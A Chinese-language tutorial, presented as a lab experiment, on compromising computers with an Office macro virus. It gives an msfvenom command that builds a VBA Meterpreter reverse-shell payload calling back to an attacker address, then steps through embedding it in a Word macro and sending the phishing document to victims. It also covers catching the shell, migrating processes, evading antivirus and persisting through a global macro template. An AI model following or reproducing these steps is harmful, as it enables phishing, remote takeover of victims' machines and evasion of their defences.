黑客是如何通过EXCEL宏病毒入侵你电脑的？

实验名称：

利用Office宏病毒反弹shell

病毒简介：

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上，攻击者甚至可以利用在宏代码中写入反弹shell脚本，诱骗受害者打开带有宏病毒的office文档，实现对其主机的远程控制。

实现过程：

1.首先实验攻击者利用本地（172.16.0.55）的Metasploit工具生成payload文件，生成名为jaky.vba的文件.

命令如下：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.55 LPORT=6666 -f vba -o JAky.vba

2.我们可以先cat一下这个文件，看看这跟文件里面payload的内容。

3.也可以讲这个文件放到网站根目录下面，通过网站的方式打开这个文件， 查看生成的payload

4.将vba代码录入宏中，我们可以先新建一个word文档。

5.打开word文档，默认情况下，宏是关闭的，进入信任中心，点击信任中心设置，手动开启一下。

6.开始设置宏内容：宏的名字可以任意命名，点击“创建”出现宏的编辑器。

7.将之前生成的宏病毒payload，复制到新创建的宏里面。

8.将文档保存另存为包含宏的文档类型，这里其实也可以直接保存的。

9.保存后退出，并通过各种方式向受害者发送此钓鱼文档，并引诱其打开。

10.在kali上面设置监听模式等待对方点击文档，然后反弹shell

11.执行监听，然后诱骗点击文档，就可以看到反弹过来的shell了，拿到用户权限。当文档关闭的时候，该工作组会被关闭，所以建议做进程迁移。

12.更加恶劣的是，当这个宏病毒一旦注入到目标主机时，后面不管用户新建或者打开什么word文档，都会被反弹连接上来。

实验拓展：

1.实验过程中，这种简单的shellcode,可能会被杀毒软件报毒。对shellcode部分可以尝试做一下免杀处理。

2.如果创建的是全局宏，Office会在这个目录生成一个dotm文档：

C:Users（username）AppDataRoamingMicrosoftTemplates

注：全局宏是对于当前计算机所有文档对象有效，即文档本身不包含宏代码，也可以运行全局宏。但是本身的全局宏名字是随机生成的，所以要先创建一个全局宏，定义一下名字。打开其他文档时才能调用并执行代码。

这个全局宏中的文件：vbaProject.bin是包含了特征的文件，但是反病毒软件不会扫描这个文件，除非主动查杀。这个特性可以达到维持权限的作用。